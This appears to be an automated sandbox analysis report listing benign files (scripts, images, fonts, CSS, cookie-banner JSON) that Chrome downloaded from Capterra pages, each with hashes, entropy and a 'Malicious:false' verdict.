                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:192:FunkwfFLK41ASTAaJ2MOWoOfGpwo3QhDiO0GnMp1nkin705L5z1hJbaZ6:FuFfFn1TxvfGpAh+KnMp1kin70tdAM
                                                                                                                                                                                                        MD5:D10EC0F09D5AAB828F95E8BFE3992BE5
                                                                                                                                                                                                        SHA1:4808794C39484179E13BCFA039D3A7A09306E02D
                                                                                                                                                                                                        SHA-256:1CC551EBBAA689077BBD1C977D3BFCC652BF921FF2E67C21027AEE8E0B3EF078
                                                                                                                                                                                                        SHA-512:A1BA974B73F884E90CC449D494354B45F910EB6678AD89057072B35AE2C0920FE665C1726B1484208B685AF1AC89C46A3C3DFE5A9FFD8A24741E1C1F7F744942
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        Preview:(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[7601],{14488:function(e,t,n){Promise.resolve().then(n.bind(n,36493))},36493:function(e,t,n){"use strict";n.r(t),n.d(t,{default:function(){return u}});var r=n(27573),i=n(34617),a=n(8558),o=n(13243);function u(){return(0,r.jsxs)(r.Fragment,{children:[(0,r.jsx)(a.Z,{useGdmAnalytics:!0,noClickOuts:!0}),(0,r.jsx)(i.ScreenContainer,{children:(0,r.jsx)(o.Custom500,{})})]})}},65880:function(e,t,n){"use strict";n.d(t,{default:function(){return i.a}});var r=n(25839),i=n.n(r)},13243:function(e,t,n){"use strict";n.d(t,{Custom500:function(){return o}});var r=n(27573),i=n(65880),a=n(39360),o=()=>(0,r.jsxs)(r.Fragment,{children:[(0,r.jsx)("title",{children:"We're experiencing an internal server problem. (500)"}),(0,r.jsxs)("div",{"data-testid":"500-page-error",className:"m-4xl flex flex-col justify-center md:flex-row",children:[(0,r.jsxs)("div",{className:"w-full md:w-7/12",children:[(0,r.jsx)("h1",{className:"mb-xl leading-3xl text-3xl font-bo
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:PNG image data, 120 x 120, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):6098
                                                                                                                                                                                                        Entropy (8bit):7.958366477550625
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:96:eNZkwt2KILOhxufakIW0S1/fswBUlyMH1gSHXS7AYiTRTlv3S8CJRndmdRJ1pf:evkGtI9fz10ufsMUlfmIv3S8CJRsTpf
                                                                                                                                                                                                        MD5:FADBFC07AE049B43DC008B875D65CEA1
                                                                                                                                                                                                        SHA1:C4CD288470927D476482D8475B61ED523D207C92
                                                                                                                                                                                                        SHA-256:8956131B298A3F795DE2199127137EC38471AF35B385265337CEF62EB72B8491
                                                                                                                                                                                                        SHA-512:0D10AC4BB7612B355D955F45A1A32559518EA0D83F907CD71025A3C8F326C61548C75A90EE589FEF2E30E40BFF195D48BEE30F92479594D2F4E1FB8A0C092A53
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        Preview:.PNG........IHDR...x...x.....9d6.....sRGB.........IDATx^..X...........j...5Qcl...........Q.h4j..S4/.%..... ..X0.....". M.e.oF1.........o......s..s..PO=..SO=........!...,U.?...}.=...}.....R.B.y.n.U.G.V..zlD..(........../@nR...G.........WDy.LpksR..v.=b..z.k...=K{..._@.....^....@..^.........w..L.]N.zlE`..oM..a.)M|#..?.-....<i?p......SO....a.HH..5.:.V+...x.nq.}.`U.Wo.*_O..@........uUU...,....+.."..T.z...f....r.t.%/#T......F.....{....'.....S......h..}..F.n..=..$.T....E....l..D..d...U..>.3~Y?_..PK.E.....W1+~ ..mNA..`...#.t.{.{.i...U>...!.)5k.\.~....Rg+v.E..]..........6k*..q...y.. 4...C/\.......|..`6....s..;t.u.l.....h.=S.j......r....r.:.....n.+..?.K4q.......=.].F.a...u{...........0!..0.D.K.%\!.......}.4L...u...:.B..y.:.Pw........lV..=.h..+..J.)....h.;...F.i..N..}:%.2K0..e.....V...g.Z.I.Ts.~.F.....>..:.k...r<.....>..E..{.f.1.....P.X.J..Esf.._.>...PR.?..+Q}...&}..D.....@..@..Y...W:..=.j.+B....f..+c.f..W$..E1...<;........5'\.0d.6........E.e..E...R..
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 72x72, segment length 16, baseline, precision 8, 120x29, components 3
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):5766
                                                                                                                                                                                                        Entropy (8bit):7.520540340123673
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:96:uN26MT0D5MdtbZPAVwzV7EIArqjisq4miWju7TGt+DV:hYNMtKwlMrqjisqXtIV
                                                                                                                                                                                                        MD5:05DD79E7632368810A77E90C062CA15B
                                                                                                                                                                                                        SHA1:66BC3A381BDDE63FB4D355F19E73964FFE8895B3
                                                                                                                                                                                                        SHA-256:0191190D6313A6AB7607D3CD99D5473E9627C6565CD1D0285A7EFE88F6B4429F
                                                                                                                                                                                                        SHA-512:BEE8ED2F5F9A92040188CECE34BD400ED2803A26ADE12CE43987DF817ED1B6D5291491A7FCD2491CA898D7CAED0C48958326AE90093533EA9655F1C88FB6DC41
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        Preview:......JFIF.....H.H.....XICC_PROFILE......HLino....mntrRGB XYZ .........1..acspMSFT....IEC sRGB.......................-HP ................................................cprt...P...3desc.......lwtpt........bkpt........rXYZ........gXYZ...,....bXYZ...@....dmnd...T...pdmdd........vued...L....view.......$lumi........meas.......$tech...0....rTRC...<....gTRC...<....bTRC...<....text....Copyright (c) 1998 Hewlett-Packard Company..desc........sRGB IEC61966-2.1............sRGB IEC61966-2.1..................................................XYZ .......Q........XYZ ................XYZ ......o...8.....XYZ ......b.........XYZ ......$.........desc........IEC http://www.iec.ch............IEC http://www.iec.ch..............................................desc........IEC 61966-2.1 Default RGB colour space - sRGB............IEC 61966-2.1 Default RGB colour space - sRGB......................desc.......,Reference Viewing Condition in IEC61966-2.1...........,Reference Viewing Condition in IEC61966-2.1........
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                        Size (bytes):242
                                                                                                                                                                                                        Entropy (8bit):4.841264175103943
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:6:gKHRUGZU8+54fZpqFtATsSr5/ENXyVvKcY:gKa42580/NXbcY
                                                                                                                                                                                                        MD5:035B21C4941C25C49FE6AFEE3F38D211
                                                                                                                                                                                                        SHA1:B10F869DE9123FCDC93547ACEAFEAEC902DBAE04
                                                                                                                                                                                                        SHA-256:C62F51DF642C73E57044111145FB74E8B0FB3235997A564CD13AA4F6AA72A0C6
                                                                                                                                                                                                        SHA-512:77F703ED71425ED6D8713FD199D992B8860624EC214C331E99C22E53683A9C3FD47E0CBBB44F5E1EA70E52C6668AF16BA6F22ED2ADC56B0B29777258D78FF200
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        URL:https://reviews.capterra.com/_next/static/css/8dc898c46ca225c7.css
                                                                                                                                                                                                        Preview:.language-selector_language-item__kO5wW{font-weight:var(--font-weight-bold);color:var(--color-primary-80)}#root.rx-modules .footer_fontLink__DOdMD{text-decoration:none;text-transform:uppercase;font-size:var(--font-size-sm);letter-spacing:2px}
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:ISO Media, AVIF Image
                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                        Size (bytes):5533
                                                                                                                                                                                                        Entropy (8bit):7.358085710910986
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:96:+7jnR5N26MT0D5MdtbZPAVwzVJqESVYC7fCV7+fFzT1cP+YT:+7DRoYNMtKwXqUCe4FzT1sT
                                                                                                                                                                                                        MD5:905B0DF70F528CCED6433BD80E01F95B
                                                                                                                                                                                                        SHA1:24D07F5050941D66670CCBECC181EA2B9A828EE8
                                                                                                                                                                                                        SHA-256:76446F391E6DE8D3305D2AD6CF77ACEC2A05514DC4376C1841AD9D5E60CE82C1
                                                                                                                                                                                                        SHA-512:2C281FD964A27E5B53320B0D0F0B89541960813017730B679AF1C51E0CAC4978A426EF1390AFBFD03B7CE163D5E96C6E71A0E973F59005F26FE40D8C79684867
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        URL:https://gdm-catalog-fmapi-prod.imgix.net/ProductLogo/f2e2e04e-14be-474e-8d90-7162080c28b0.png?w=60&h=60&dpr=2&auto=format
                                                                                                                                                                                                        Preview:... ftypavif....avifmif1miafMA1B....meta.......(hdlr........pict............libavif.....pitm.........,iloc....D..................................Biinf..........infe........av01Color.....infe........av01Alpha.....iref........auxl..........iprp....ipco....ispe.......x...x....pixi............av1C.......Tcolrprof...HLino....mntrRGB XYZ .........1..acspMSFT....IEC sRGB.......................-HP ................................................cprt...P...3desc.......lwtpt........bkpt........rXYZ........gXYZ...,....bXYZ...@....dmnd...T...pdmdd........vued...L....view.......$lumi........meas.......$tech...0....rTRC...<....gTRC...<....bTRC...<....text....Copyright (c) 1998 Hewlett-Packard Company..desc........sRGB IEC61966-2.1............sRGB IEC61966-2.1..................................................XYZ .......Q........XYZ ................XYZ ......o...8.....XYZ ......b.........XYZ ......$.........desc........IEC http://www.iec.ch............IEC http://www.iec.ch............................
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:ISO Media, AVIF Image
                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                        Size (bytes):4770
                                                                                                                                                                                                        Entropy (8bit):7.199557740320707
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:96:+7jk5N26MT0D5MdtbZPAVwzVJrQU03pTnkUcES41qF2:+7goYNMtKwXrQUWk1j4U2
                                                                                                                                                                                                        MD5:83C530AB57E721C39F83BE2E91F94746
                                                                                                                                                                                                        SHA1:72C40999A238535B9BD33080B1FFC1EE2B612CF2
                                                                                                                                                                                                        SHA-256:E1BFD6A1A37D8DE7EA55E960B2D6C4860C114BE4EA38ACE2D6CED215F924E917
                                                                                                                                                                                                        SHA-512:969C1D7AF4FA596A580BFA30599880603D7247C154702D1486296FD8EF801A17AA88B95C82525AC42D053D96C4B307968D65D1BDBCC1846F0C58569D9923F408
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        URL:https://gdm-catalog-fmapi-prod.imgix.net/ProductLogo/868db486-b684-43a7-827e-5e14b017756d.png?w=60&h=60&dpr=2&auto=format
                                                                                                                                                                                                        Preview:... ftypavif....avifmif1miafMA1B....meta.......(hdlr........pict............libavif.....pitm.........,iloc....D............v...,.............l...Biinf..........infe........av01Color.....infe........av01Alpha.....iref........auxl..........iprp....ipco....ispe.......x........pixi............av1C.......Tcolrprof...HLino....mntrRGB XYZ .........1..acspMSFT....IEC sRGB.......................-HP ................................................cprt...P...3desc.......lwtpt........bkpt........rXYZ........gXYZ...,....bXYZ...@....dmnd...T...pdmdd........vued...L....view.......$lumi........meas.......$tech...0....rTRC...<....gTRC...<....bTRC...<....text....Copyright (c) 1998 Hewlett-Packard Company..desc........sRGB IEC61966-2.1............sRGB IEC61966-2.1..................................................XYZ .......Q........XYZ ................XYZ ......o...8.....XYZ ......b.........XYZ ......$.........desc........IEC http://www.iec.ch............IEC http://www.iec.ch............................
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:ASCII text, with very long lines (36995), with no line terminators
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):36995
                                                                                                                                                                                                        Entropy (8bit):5.200154539819763
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:384:h90Wjj74oB5Tf1JcNvDIweEzpg3pmAX7XODXWcWLfN5HS8IWpMvyfA+g/v:h90yj74A4pDNpM7XGWRfN51IOfA+2v
                                                                                                                                                                                                        MD5:7B7E39FCA61E2FC0B605DB6B496695F1
                                                                                                                                                                                                        SHA1:97C264DC630C80461F73675041D50ECD9760D0C5
                                                                                                                                                                                                        SHA-256:23AAEB229C57F3DA16FF1786D890F81DD548CCEC78081B918C3B7AAA70827BA2
                                                                                                                                                                                                        SHA-512:FD74C8B2A82CC3A9E76BB7279D3D639315EF4C638CCCE9C8D1EDFD674266D123D44037551630E498579BCA3A1F0848954146CA7D80B41DAFF6B1EDD26D17842B
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        Preview:(window.webpackJsonp=window.webpackJsonp||[]).push([[37],{"+nxv":function(e,t,n){"use strict";n.d(t,"a",function(){return initAndBind});var r=n("zgdO"),i=n("usiZ");function initAndBind(e,t){!0===t.debug&&("undefined"===typeof __SENTRY_DEBUG__||__SENTRY_DEBUG__?r.c.enable():console.warn("[Sentry] Cannot initialize SDK with `debug` option using a non-debug bundle."));var n=Object(i.a)(),s=n.getScope();s&&s.update(t.initialScope);var a=new e(t);n.bindClient(a)}},"5g57":function(e,t,n){"use strict";n.d(t,"a",function(){return v}),n.d(t,"b",function(){return addGlobalEventProcessor});var r=n("WwEg"),i=n("jm9a"),s=n("nfbA"),a=n("uIJS"),o=n("wQh9"),c=n("26VM"),u=n("xqFT"),_=n("bTzN"),d=n("zgdO"),l=n("Iwrg"),p=n("2nP+"),f=n("Te+l"),v=function(){function Scope(){Object(a.a)(this,Scope),this._notifyingListeners=!1,this._scopeListeners=[],this._eventProcessors=[],this._breadcrumbs=[],this._attachments=[],this._user={},this._tags={},this._extra={},this._contexts={},this._sdkProcessingMetadata={}}r
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                        Size (bytes):9721
                                                                                                                                                                                                        Entropy (8bit):5.35902308660375
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:192:6KyAQgtNBIWguxw68uCZItctpwfTh3fYwuoOE5YBTi+Q+Qsf1POyj/0Pp5b5ffv7:04rsCJ9cO51r
                                                                                                                                                                                                        MD5:17E5CF7E2FCAED7692184F43C4577219
                                                                                                                                                                                                        SHA1:F47F0887E191E30A49391514CEDDABFC26CC9BD7
                                                                                                                                                                                                        SHA-256:09B627933E01FAA4979DC5661F7E616C7DB1C12EA1984CA0549BDB253D24DA9B
                                                                                                                                                                                                        SHA-512:30ADC60FD2051044E070F467D1AB46AFE0071D3D4B410527C68684014BF9D9D0A1CE0371EF4E02F02C6017AF2D0D53B4EFAED72D0FB0644B5514FA26D1A521F9
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        URL:https://cdn.cookielaw.org/scripttemplates/202403.2.0/assets/otCenterRounded.json
                                                                                                                                                                                                        Preview:. {. "name": "otCenterRounded",. "html": "PGRpdiBpZD0ib25ldHJ1c3QtYmFubmVyLXNkayIgY2xhc3M9Im90Q2VudGVyUm91bmRlZCI+PGRpdiBjbGFzcz0ib3Qtc2RrLWNvbnRhaW5lciIgcm9sZT0iYWxlcnRkaWFsb2ciIGFyaWEtZGVzY3JpYmVkYnk9Im9uZXRydXN0LXBvbGljeS10ZXh0Ij48ZGl2IGNsYXNzPSJvdC1zZGstcm93Ij48ZGl2IGlkPSJvbmV0cnVzdC1ncm91cC1jb250YWluZXIiIGNsYXNzPSJvdC1zZGstdHdlbHZlIG90LXNkay1jb2x1bW5zIj48ZGl2IGlkPSJvbmV0cnVzdC1wb2xpY3kiPjxkaXYgY2xhc3M9ImJhbm5lci1oZWFkZXIiPjxkaXYgY2xhc3M9ImJhbm5lcl9sb2dvIj48L2Rpdj48L2Rpdj48aDIgaWQ9Im9uZXRydXN0LXBvbGljeS10aXRsZSI+VGl0bGU8L2gyPjxkaXYgaWQ9Im9uZXRydXN0LXBvbGljeS10ZXh0Ij50ZXh0PGEgaHJlZj0iIyI+cG9saWN5PC9hPjwvZGl2PjxkaXYgY2xhc3M9Im90LWRwZC1jb250YWluZXIiPjxoMyBjbGFzcz0ib3QtZHBkLXRpdGxlIj48L2gzPjxkaXYgY2xhc3M9Im90LWRwZC1jb250ZW50Ij48cCBjbGFzcz0ib3QtZHBkLWRlc2MiPjwvcD48L2Rpdj48L2Rpdj48L2Rpdj48ZGl2IGlkPSJiYW5uZXItb3B0aW9ucyI+PGRpdiBjbGFzcz0iYmFubmVyLW9wdGlvbiI+PGJ1dHRvbiBhcmlhLWV4cGFuZGVkPSJmYWxzZSIgY2xhc3M9ImJhbm5lci1vcHRpb24taW5wdXQiPjxzcGFuIGNsYXNzP
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:Web Open Font Format (Version 2), TrueType, length 47048, version 1.0
                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                        Size (bytes):47048
                                                                                                                                                                                                        Entropy (8bit):7.995855342082746
                                                                                                                                                                                                        Encrypted:true
                                                                                                                                                                                                        SSDEEP:768:Czwpv8MufPLEja54/un6n/rlUtUHTKgsdiEyvaFJWTVwkE0MsPGCYqEYny3TPCwB:8gvSfPLH5a/YUHJsdidvareax0MsPGCC
                                                                                                                                                                                                        MD5:87A1556B696AE2CB1A726BD8C4584A2F
                                                                                                                                                                                                        SHA1:1BE0F6F39E0CF316F9827F945EEEAEF8294CC37B
                                                                                                                                                                                                        SHA-256:141F0C53E457585D4AC7426EB3D757666D250EE6FBF0E9C0878128E4C627F0B1
                                                                                                                                                                                                        SHA-512:AD9EE74772783ECF885C9D828D0D54FD4B65F66BA316BA0A5B241B910F4ECED6DFA3ECFA4F2CDBEED4EB0AD9929EBC207F9CA3099348498F7E1ACF7192FDE98D
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        URL:https://fonts.gstatic.com/s/ptsans/v17/jizfRExUiTo99u79B_mh0O6tLQ.woff2
                                                                                                                                                                                                        Preview:wOF2...............$...d..........................^..H.`..D.,........`.....V...H.6.$..(. .........[Rzq...........k.q..`.tG.9..V.c..v .h.....??...i.m)...\.o...T....."...)+..n0Y.`.@.&k.E [..fI..M..y..$1.....A....#....@*..O..._.NP.k6..T......C&:#.3...S..H....O...k.=.^.P.2.!|..!NZ..>.......1.+.&........r...0.`)0z..3...g8H.....imEm7..rd.r'{..22..>.dPm.F..Bb$6.~.7.Ik..~x...5ED...(.*.k..wAy.1E`..D...?3.V2{cg...2...#*b..>_..........r.......%.P.LF.f....l..Vl,Y....6`..1.G.@...b..f`..b.*.8o._*..t..}I....m.v.q.2m....A..p.)...p...(.0M5p8..m~..LI!!.A.%xh}DW....}.}.6{...$.M.%o.<.vO;.$._..$....[.J...T.I..9..I%T6!5. I.*..Ae.l.*..Tb[.Jl..........p$..rl3h..I..A.(I.!....,bE..D.........K ....$.H.d...f..BM...j../.P_...2.-..s.SS.i.....d..].hDA....Kzu.<U..~._.!....(....^....mU... ..H..e..#k~.......kk..H._..[...j.Kx.v....-Ss....X.=...3.r.t..e^.....C.....*............$..ji...,u.^V..Y.1 F.._iO...o/..d9I;..........L2.o.nw...'B....j........."..4...p....u...V..1..1..poMy
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:PNG image data, 128 x 142, 8-bit colormap, non-interlaced
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):3385
                                                                                                                                                                                                        Entropy (8bit):7.576347060622916
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:96:8raPq+cgvUAPFxdRH0Ww98bqEz8Ize0RW56Y9:8raPnc0UATH0WwUqM8Ize0jK
                                                                                                                                                                                                        MD5:760E0C596FE3E503CC8FA16B2E51C74A
                                                                                                                                                                                                        SHA1:087982D5ABBD8D17FE191B93347D5553372BED7E
                                                                                                                                                                                                        SHA-256:800F2453F59B0ABF2BFE806872A375065225B9EFB600CE0899CE0B73D50C1EB5
                                                                                                                                                                                                        SHA-512:AFC742EAA26895D53EF62F6771BFFA3A053BF294CE931CEAE40370EEC65AFB8578C7D0EEE09255AEBF6B43AFA623373EF337D0F6FF948E12EF02DAC7A760053C
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        Preview:.PNG........IHDR.....................sRGB.........PLTEGpL.......w..w..v .U..v..v..u..m$....w..u..w..v..u..v..t!.w..v..v .v..v..s..v..w..w..u..u..v..w..t!.v..v..v..v!.t..t..v..v..v..v..v..u..v .v..v..v..w..y..r..w..v..v..v..v..w..v..v..w!.v..w..w..s .y .u..u..t..v..w.....w..w..u..u..x..v..x!.v..v..v..w..w..t#.u..v..w..u..v..v...*.v..w..q..v .v..v..v..s..v..v..v..y".v..v..u..v..s..v..v..w..s..w..f..v..v..v..v..u..v..w..v..v..w..w..w..v..v .v..v..w..v..r*.v..v .w..v..v..v..v..v..w..w..y..w..u..u .v..v .v..w.....v..v..v..v..v..v .s..w..v..w..w..v..m$.v..v..u..w..v..u .v..v..w..v..w..j..u..v..v..x..v..v..x..v..v..v..w..v..u..u..v .u..w..u..v..u..u..v..w..v..w..w..v..w..v..w..u..w .w".v..u .v..v .v..u..v..v..u..v..v..v..u..w..w..t..w .u .w..v..w..w..w .u..u..v..u..v..v..w..v..y .w..v..v..v..x .w..v..x .x .w..w..w .y &..0....tRNS....+....%...o.|.....a..0...7=.Q....D!..f...H............/h..((m$9s...V5...&......,..N".......I1/.......*...&....EO..l.+.vz...<C..Xrn^S.Te...3....i..K.u.P......
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:ASCII text
                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                        Size (bytes):11987
                                                                                                                                                                                                        Entropy (8bit):4.5861644474244025
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:192:RgxcTkFr6oGzjRrXdJmYAz3xnYxm5QSO7LaOkeeY6NJHj8lyXT7mEsWFC/vpXYt0:ixc2kJmJz3xZ5SJNKNy+aEf4pIb+iyp
                                                                                                                                                                                                        MD5:8CF9A7A278C4BEB3BCB28FFF2789AA84
                                                                                                                                                                                                        SHA1:412190BE51B3D94E279E882B212BC2B80178B613
                                                                                                                                                                                                        SHA-256:6A734C88FA59E21CBA702F37DCEBDCC4426C1BC065DA34274B4B99DC93509459
                                                                                                                                                                                                        SHA-512:F169EABDB390E711D49517B59358D6EDF7E9F88F28AA68751E8B93AEBE56AC65EC6C9650DDD7AB6901A3A2869B2608206DC1E6ACFF224838A74E5DB34362E5F5
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        URL:https://www.capterra.com/sa-static-assets/getSaConversionTrackingData.js
                                                                                                                                                                                                        Preview:var sa_tracking = (function () {. var storage = {};. const brands = [. {. name: 'capterra',. searchTerm: 'capterra',. },. {. name: 'capterra',. searchTerm: 'capstage',. },. {. name: 'getapp',. searchTerm: 'getapp',. },. {. name: 'getapp',. searchTerm: 'gappdev',. },. ];. return {. _applySourceMediumHack: (applySourceMediumHack = (sessionData) => {. if (. sessionData.gclid !== '-' &&. sessionData.ga_source === '(direct)' &&. sessionData.ga_medium === '(none)'. ) {. sessionData.ga_source = 'google';. sessionData.ga_medium = 'cpc';. }.. if (sessionData.referrer_partner_id) {. const a = document.createElement('a');. a.href = sessionData.referrer_url;. sessionData.ga_source = a.hostname;. sessionData.ga_medium = 'affiliate';. }. return sessionData;. }),.. _getCookie: (getCookie = (name) => {. const v = document.cookie.
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:PNG image data, 120 x 33, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):3415
                                                                                                                                                                                                        Entropy (8bit):7.9270509271128144
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:96:FVq3GX8P555v0Iw7HvAZK9YDtXV9scPPN1X1FYJFP4S7:FVq3GMP55N0x74BDNDsSTrYYS7
                                                                                                                                                                                                        MD5:0D1F7EB7853368FA94075C9802AB359B
                                                                                                                                                                                                        SHA1:F72C26A19E8E5478EE011AEB6A608E180EECBFED
                                                                                                                                                                                                        SHA-256:86D63DA1C76807C99420F3C4D3AE44D5BFFC9A5B6AF754B3A314A8A4486090CC
                                                                                                                                                                                                        SHA-512:F5FF4DC5F82D533C311C2946D467956D10629C9AC8C83F0B1887BC2775DE857A68EFF5ED180B8C23407F8356016C4D85E7AAB21EF098EF5CE0DE239A3F2DAB36
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        Preview:.PNG........IHDR...x...!.......o.....sRGB.........IDAThC..p].y....{u-a.....B.2xH.%.l.1..<Ph.H......[.e...i.&d.P..r.%.......I....-.h.-i...R...dIF.q.~_g.t..-.dl@?.^.{v.=....F.TC...\..'....!.G.........mCt..,....o......@...-iQi2.......lA.7.*.Z...._D....7.#.].LD...H.r..Pv|..M.'.x..ill.e..-@_...Ik...+....p.......??_....L.Ee.......w...M.<..@}F8...L43#.3.j"...Ow.:...G..pZ.....I*....m%%..>Q......Q<^.r....c9.tN.7.9...vg.....Z.....A.VC...8..<.pN^......t..%I.-Xz..t..../.*..Qt}YY]YY..a.........}.Ou,..kt.K:*G.*.6.9.2e@..q..c..Xmm......6......d......6.Y.V.D.7."4..HYYm$.............O$.F.t1.b.J.._X.jM.p;X....|..Pc....l..i5T07.L.!.o. .......*...=..$'...Q^^.Y..K.....m.^....C....O(L.".v..H .>..KJo..[N.D.>.D.u.xX..."....~O../g?. C2....9..E....v.m..2....e5>.....*c........y..(......D.x,f\i...T..}J.|..+..wP...)....y,.%2.GV.....!..6La..!...d...xC!..K...@\.......%K..x1.'...w.5.s.........]........FE........d.......B...^d..*.2..Up....>0.....U.Q.."...d.@;..S..n~-;..q..7."
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:ASCII text, with very long lines (21302), with no line terminators
                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                        Size (bytes):21302
                                                                                                                                                                                                        Entropy (8bit):5.39265571540588
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:384:MQnMQ7bd98IIG/9TE2URFGs6EI6zD4UzR/ye/wwcGkakN/:b75980FTIEfa8oR/X1cJJ
                                                                                                                                                                                                        MD5:3CF5078223819D96522832E72D90FF2D
                                                                                                                                                                                                        SHA1:F64106CB7E20A941DDA1D9A89EBAFD6F21B4C640
                                                                                                                                                                                                        SHA-256:BC57E09B8A43CE5E5B7616D42BA5D8C4DAB0039085AFA4F1B96F51C7C26A605A
                                                                                                                                                                                                        SHA-512:E578DE9932011198E7B2ED32A6D70CEEA5816DF419CFFAC18179205303E45CA425E24CC2C3D461B2404E075773D61C7E3C3F20DB7FB07DE950D905D4F6C29C98
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        URL:https://www.capterra.com/assets-capterra-monorepo-bx-capterra-www/_next/static/chunks/1792-00af84ae39314883.js
                                                                                                                                                                                                        Preview:"use strict";(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[1792],{65880:function(e,t,r){r.d(t,{default:function(){return o.a}});var n=r(25839),o=r.n(n)},87659:function(e,t,r){r.d(t,{default:function(){return o.a}});var n=r(65469),o=r.n(n)},79912:function(e,t,r){Object.defineProperty(t,"__esModule",{value:!0}),Object.defineProperty(t,"addLocale",{enumerable:!0,get:function(){return n}}),r(72679);let n=function(e){for(var t=arguments.length,r=Array(t>1?t-1:0),n=1;n<t;n++)r[n-1]=arguments[n];return e};("function"==typeof t.default||"object"==typeof t.default&&null!==t.default)&&void 0===t.default.__esModule&&(Object.defineProperty(t.default,"__esModule",{value:!0}),Object.assign(t.default,t),e.exports=t.default)},52774:function(e,t,r){function n(e,t,r,n){return!1}Object.defineProperty(t,"__esModule",{value:!0}),Object.defineProperty(t,"getDomainLocale",{enumerable:!0,get:function(){return n}}),r(72679),("function"==typeof t.default||"object"==typeof t.default&&null!==t.default)
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                        Size (bytes):123763
                                                                                                                                                                                                        Entropy (8bit):5.315349042301051
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:1536:hd5Yw+mj1mL3i831LrO/dlvod0ZmmNOKq5E80av7:h2L3iq0A4Od5uaz
                                                                                                                                                                                                        MD5:C4205CD479AA3760E9EB687999C79064
                                                                                                                                                                                                        SHA1:F305C2033846FA42A8C6716A7089D22331747DF1
                                                                                                                                                                                                        SHA-256:E5794B1CBAA97512645BF6471EEB7533DC53DBF8E2AC1D4649F147129B27A537
